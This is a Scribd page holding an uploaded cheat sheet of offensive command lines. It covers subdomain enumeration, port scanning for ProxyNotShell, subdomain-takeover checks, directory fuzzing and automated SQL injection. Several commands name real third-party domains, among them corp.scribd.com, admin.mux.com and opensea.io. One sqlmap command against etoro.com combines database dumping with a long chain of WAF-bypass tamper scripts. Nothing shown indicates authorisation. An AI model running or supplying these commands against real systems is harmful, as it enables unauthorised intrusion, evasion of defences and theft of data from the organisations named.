Scribd Logo
Upload

Welcome to Scribd!

  • Command ZZ

    Uploaded by

    ahmed
    31 views2 pages
    The document provides instructions for performing reconnaissance on a target including: 1. Using subfinder to find subdomains and nmap to scan ports 443 for vulnerabilities. 2. Using Amass to enumerate subdomains and Subjack to check for subdomain takeover vulnerabilities. 3. Using dirsearch to fuzz for directories on a target site. 4. Using sqlmap to scan for SQL injection vulnerabilities and bypass web application firewalls. 5. Using various tools like dirbuster, ffuf, katana to perform directory and file fuzzing and discovery on a target.

    Original Description:

    it is POC

    Original Title

    Command Zz

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document provides instructions for performing reconnaissance on a target including: 1. Using subfinder to find subdomains and nmap to scan ports 443 for vulnerabilities. 2. Using Amass to enumerate subdomains and Subjack to check for subdomain takeover vulnerabilities. 3. Using dirsearch to fuzz for directories on a target site. 4. Using sqlmap to scan for SQL injection vulnerabilities and bypass web application firewalls. 5. Using various tools like dirbuster, ffuf, katana to perform directory and file fuzzing and discovery on a target.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    31 views2 pages

    Command ZZ

    Uploaded by

    ahmed
    The document provides instructions for performing reconnaissance on a target including: 1. Using subfinder to find subdomains and nmap to scan ports 443 for vulnerabilities. 2. Using Amass to enumerate subdomains and Subjack to check for subdomain takeover vulnerabilities. 3. Using dirsearch to fuzz for directories on a target site. 4. Using sqlmap to scan for SQL injection vulnerabilities and bypass web application firewalls. 5. Using various tools like dirbuster, ffuf, katana to perform directory and file fuzzing and discovery on a target.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    Reconn :

    subfinder -d corp.scribd.com -all -silent -o subdomain.txt ; nmap -iL subdomain.txt


    -p 443 --script proxynotshell_checker.nse

    Subdomain Takeover Using Amass + SubJack

    $ amass enum -norecursive -noalts -d {target_domain} > {target_domain}.txt ;


    subjack -w {target_domain}.txt -t 100 -timeout 30 -ssl -c
    ~/subjack/fingerprints.json -v 3

    python3 ~/tools/dirsearch/dirsearch.py -u TARGET -t 50 -e html

    fOR COPY FILES :-

    pscp -P 22 Burp.txt admin@ip-172-26-5-166:/home/admin/

    subzy --targets target.txt --hide_fails

    sqlmap and WAF bypass:

    sqlmap -u "https://www.etoro.com/wp-content" --dbs --dump --batch --random-agent --


    forms --ignore-code=401 --level=5 --
    tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,blue
    coat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,grea
    test,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase

    dir fuzzing :

    dirsearch -b -u http://target.com -e
    conf,config,bak,backup,swp,old,db,sql,asp,aspx,py,rb,php,bak,bkp,cache,cgi,conf,csv
    ,html,inc,jar,js,json,jsp,lock,log,rar,old,sql,swp,tar,txt,wadl -x 404,301,302 -r -
    R 3

    katana -u https://admin.mux.com -d 10 -jc -kf -o test-katana.txt

    ffuf -recursion -mc all -ac -c -


    e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.sql,.old,.at,.inc -w
    path -u https://target.com/FUZZ -t 5000

    sql inj auto :

    findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli


    >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
    find subdomians :

    subfinder -d opensea.io -nW -silent -all

    cat | httpx -silent -status-code -follow-redirects -threads 10 | tee domain.txt

    lightm='\e[95m';lightr='\e[91m';while read sub; do echo -e "\n$lightm$sub\


    n-----------------------$lightr"; echo $sub | katana -silent -headless -depth 3 -
    js-crawl ; done < file_contains_domians.txt

    You might also like